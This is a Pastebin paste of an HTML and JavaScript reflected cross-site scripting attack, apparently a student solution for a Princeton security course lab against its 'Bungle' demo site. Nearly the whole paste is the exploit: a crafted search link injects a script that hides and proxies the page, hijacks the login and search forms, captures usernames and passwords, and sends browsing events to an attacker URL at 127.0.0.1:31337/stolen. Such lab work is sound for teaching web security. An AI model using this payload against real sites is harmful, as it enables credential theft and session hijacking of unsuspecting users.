Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function payload(attacker) {
- function log(data) {
- console.log($.param(data));
- $.get(attacker, data);
- }
- function proxy(href) {
- //TODO: modify displayed url
- //TODO: push a modified page (that loads the script)
- var stateObj = {
- foo: href
- };
- history.pushState(stateObj, "page 2", href);
- $("html").load(href, function() {
- $("html").show();
- // replace all links with proxy
- $('a').each(function() {
- console.log("replaced sth :D");
- var value = $(this).attr('href');
- $(this).attr('onClick', /*proxy.toString() + ';*/'proxy(\"' + value + '\")');
- $(this).attr('href', '#');
- });
- //hijack login form
- if ($('#log-in-btn').length) {
- $('#log-in-btn').on("click", function(e) {
- e.preventDefault();
- var un = $('#username').val();
- var pw = $('#userpass').val();
- //TODO: log to attacker
- console.log("btn clicked: " + un + ", " + pw);
- $.ajax({
- url: "./login",
- data: {
- username: un,
- password: pw,
- },
- type: "POST",
- success: function (data) {
- $("html").html(data);
- proxy("/");
- }
- })
- })
- }
- // hijack search form
- if ($('#search-btn').length) {
- $('#search-btn').on("click", function(e) {
- e.preventDefault();
- var attr = $("#query").val();
- $.ajax({
- url: "./search",
- data: {
- q: attr
- },
- type: "GET",
- success: function (data) {
- $("html").html(data);
- proxy("search?q=" + attr);
- }
- })
- })
- }
- //TODO: modify logout button
- log({
- event: "nav",
- uri: href
- });
- });
- }
- $("html").hide();
- // load our script on the page
- $(document).ready(function() {
- var script = document.createElement('script');
- script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString();
- document.body.appendChild(script);
- console.log("ready");
- });
- proxy("/");
- }
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
- } else { // Implement code to defeat XSS defenses here.
- }
- }
- var xssdefense = 0;
- var target = "http://cos432-assn3.cs.princeton.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3>parse error</h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement